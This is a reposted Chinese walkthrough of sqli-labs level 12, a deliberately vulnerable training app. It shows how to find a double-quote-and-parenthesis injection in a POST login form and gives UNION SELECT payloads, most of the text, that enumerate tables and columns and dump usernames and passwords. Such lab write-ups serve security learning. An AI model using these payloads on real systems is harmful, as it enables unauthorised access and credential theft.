web——sqliabs靶场——第十二关——(基于错误的双引号 POST 型字符型变形的注入)
判断注入类型
a' OR 1 = 1#
发现没有报错 ,说明单引号不是闭合类型
测试别的注入条件
a') OR 1 = 1#
a')) OR 1 = 1#
a" OR 1=1
发现可以用双引号闭合
发现是")闭合
之后的流程还是与11关一样
爆破显示位
先抓包
是post传参,用hackbar来传参
uname=ad") order by 2 -- +&passwd=admin&submit=Submit
uname=ad") order by 3 -- +&passwd=admin&submit=Submit
爆破库名
uname=ad") union select version(),database() -- +&passwd=admin&submit=Submit
爆破表名
uname=ad") union select group_concat(table_name),3 from information_schema.tables where table_schema='security'-- +&passwd=admin&submit=Submit
爆破列名
uname=ad") union select group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'-- +&passwd=admin&submit=Submit
爆具体数据
uname=ad") union select group_concat(username,password),3 from users -- +&passwd=admin&submit=Submit
结束
原文地址:https://blog.csdn.net/2301_80905479/article/details/143898710
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!